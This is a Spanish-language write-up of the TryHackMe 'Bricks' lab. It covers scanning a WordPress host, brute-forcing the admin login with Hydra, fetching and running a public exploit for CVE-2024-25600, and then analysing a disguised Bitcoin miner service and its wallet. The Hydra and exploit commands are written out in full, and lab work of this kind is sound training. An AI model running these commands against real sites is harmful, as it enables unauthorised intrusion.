Logo

TryHackMe – Bricks

🧩 CVE: N/A 💪 Dificultad: Desconocida 📅 Fecha: 12/5/2025
🔖 Hydra 🔖 WordPress 🔖 OSINT

🕵️ Introducción

En este reto de TryHackMe nos enfrentamos a un escenario en el que un sitio WordPress ha sido comprometido por un actor malicioso. Nuestra misión es investigar, identificar cómo se produjo el ataque, qué malware fue desplegado y qué grupo está detrás.

Herramientas y recursos externos utilizados

Hydra

https://github.com/Chocapikk/CVE-2024-25600

🔍 1. Reconocimiento

Comenzamos con un escaneo completo:
nmap -sCV -p- 10.10.72.226

Puertos abiertos

  • 22
  • 80
  • 443
  • 3306

🔢 2. Enumeración de servicios

  • 22/tcp – OpenSSH
  • 80/tcp – WebSockify (retorna error 405)
  • 443/tcp – Apache + WordPress 6.5
  • 3306/tcp – MySQL (sin autenticación)

🔎 3. Análisis e investigación

Enumeración de WordPress

Usando curl y wpscan, identificamos que el tema activo es Bricks.

Al buscar vulnerabilidades conocidas, encontramos el CVE:

  • CVE-2024-25600: vulnerabilidad crítica que permite ejecución remota de comandos desde el editor del tema Bricks.

💣 4. Acceso inicial o administrativo

Tras enumerar el usuario administrator, ejecutamos fuerza bruta con hydra y obtenemos acceso:

hydra -l administrator -P rockyou.txt https://bricks.thm -s 443 -S -f \
http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:S=Location: /wp-admin/"

🔓 5. Explotación

Usamos el exploit público para el CVE-2024-25600:

wget https://raw.githubusercontent.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT/main/CVE-2024-25600.py

Al ejecutarlo con credenciales válidas, logramos ejecutar comandos remotos y abrir una shell interactiva:

python3 CVE-2024-25600.py --url https://bricks.thm --username administrator --password ***** --cmd id

🐚 6. Post-explotación

Accedemos a /var/www/html/ y encontramos la flag inicial:

THM{fl46_650c844110baced87e1606453b93f22a}

🔍 7. Proceso y servicio sospechoso

Revisamos los procesos activos y servicios del sistema, encontrando uno sospechoso:

ubuntu.service - TRYHACK3M
ExecStart=/lib/NetworkManager/nm-inet-dialog

El proceso asociado es: nm-inet-dialog.

📁 Análisis del miner

Identificamos el archivo de log del minero en:

/lib/NetworkManager/inet.conf

Este archivo contiene líneas como:

[*] Bitcoin Miner Thread Started

Y una clave codificada como:

ID: WW1NeGNY...

🔓 Decodificación de wallet

Decodificando el valor de ID en base64 (tres veces), obtenemos:

bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa

Una dirección de Bitcoin válida (Bech32) usada para recibir ganancias del minero.

🕵️‍♂️ 8. Asociación con grupo de amenazas

Rastreando la dirección en fuentes OSINT, encontramos que ha sido usada en transacciones ligadas al grupo de ransomware LockBit.

🧠 9. IOCs (Indicators of Compromise)

IPs, hashes, URLs, etc.

📝 10. Conclusión

Este reto combina:

  • Enumeración de WordPress
  • Explotación real de CVE
  • Escalada post-explotación
  • Análisis forense y OSINT

Bricks_Heist.png